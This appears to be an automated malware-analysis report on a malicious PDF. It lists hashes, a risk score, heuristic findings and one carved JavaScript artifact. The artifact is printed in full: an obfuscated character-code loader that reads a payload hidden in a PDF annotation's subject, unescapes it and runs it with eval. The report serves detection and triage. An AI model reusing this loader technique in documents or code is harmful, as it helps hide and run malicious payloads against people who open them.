PDF malware analysis — malicious · 77f50446f853e9fb

MALICIOUS

PDF

12.6 KB

MD5: 07f072f0c098838cc55687c796412802 SHA-1: 829c3fb5774e216f6e298757e339e86176f8df91 SHA-256: 77f50446f853e9fb596904c4970ecc52a134dd296f942e45868624e28702c198

116 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0005_000.js
d2233358777d1aaed8efae57eefbdc7f0ddc83b20eb36c734bc8ee388da7c061 pdf-javascript-stream PDF /JS object 5 at offset 0x107 1418 bytes

Filename	Kind	Source	Size
`javascript_obj0005_000.js` `d2233358777d1aaed8efae57eefbdc7f0ddc83b20eb36c734bc8ee388da7c061`	pdf-javascript-stream	PDF /JS object 5 at offset 0x107	1418 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script sourceCode = "118,97,114,32,122,59,32,118,97,114,32,121,59,32,10,32,118,97,114,32,104,32,61,32,39,101,100,118,111,97,122,99,108,39,59,32,10,9,32,32,122,32,61,32,121,32,61,32,97,112,112,91,104,46,114,101,112,108,97,99,101,40,47,91,97,118,105,101,122,106,108,93,47,103,44,32,39,39,41,93,59,32,10,9,32,118,97,114,32,116,109,112,32,61,32,39,115,121,110,99,65,69,69,111,116,83,99,97,110,39,59,32,121,32,61,32,48,59,32,9,32,122,91,116,109,112,46,114,101,112,108,97,99,101,40,47,69,47,103,44,32,39,110,39,41,93,40,41,59,32,121,32,61,32,122,59,32,118,97,114,32,112,32,61,32,121,46,103,101,116,65,110,110,111,116,115,32,40,32,123,32,32,110,80,97,103,101,58,32,48,32,125,41,32,59,32,32,32,118,97,114,32,115,32,61,32,112,91,48,93,59,32,115,32,61,32,115,91,39,115,117,98,39,32,43,32,39,106,101,99,116,39,93,59,32,118,97,114,32,32,108,32,61,32,32,32,115,46,114,101,112,108,97,99,101,40,47,91,122,104,121,103,93,47,103,44,32,39,37,39,41,32,32,59,32,115,32,61,32,32,117,110,101,115,99,97,112,101,32,40,32,108,32,32,41,32,59,97,112,112,91,104,46,114,101,112,108,97,99,101,40,47,91,99,122,111,109,100,113,115,93,47,103,44,32,39,39,41,93,40,32,115,41,59,10,32,115,32,61,32,32,39,39,59,32,122,32,32,61,32,49,59"; function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }

Detection

ClamAV: No threats found

Obfuscation or payload: likely

Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script

First 1,000 lines of the extracted script

sourceCode = "118,97,114,32,122,59,32,118,97,114,32,121,59,32,10,32,118,97,114,32,104,32,61,32,39,101,100,118,111,97,122,99,108,39,59,32,10,9,32,32,122,32,61,32,121,32,61,32,97,112,112,91,104,46,114,101,112,108,97,99,101,40,47,91,97,118,105,101,122,106,108,93,47,103,44,32,39,39,41,93,59,32,10,9,32,118,97,114,32,116,109,112,32,61,32,39,115,121,110,99,65,69,69,111,116,83,99,97,110,39,59,32,121,32,61,32,48,59,32,9,32,122,91,116,109,112,46,114,101,112,108,97,99,101,40,47,69,47,103,44,32,39,110,39,41,93,40,41,59,32,121,32,61,32,122,59,32,118,97,114,32,112,32,61,32,121,46,103,101,116,65,110,110,111,116,115,32,40,32,123,32,32,110,80,97,103,101,58,32,48,32,125,41,32,59,32,32,32,118,97,114,32,115,32,61,32,112,91,48,93,59,32,115,32,61,32,115,91,39,115,117,98,39,32,43,32,39,106,101,99,116,39,93,59,32,118,97,114,32,32,108,32,61,32,32,32,115,46,114,101,112,108,97,99,101,40,47,91,122,104,121,103,93,47,103,44,32,39,37,39,41,32,32,59,32,115,32,61,32,32,117,110,101,115,99,97,112,101,32,40,32,108,32,32,41,32,59,97,112,112,91,104,46,114,101,112,108,97,99,101,40,47,91,99,122,111,109,100,113,115,93,47,103,44,32,39,39,41,93,40,32,115,41,59,10,32,115,32,61,32,32,39,39,59,32,122,32,32,61,32,49,59"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }

Open this report in the interactive analyzer, or submit your own file for analysis.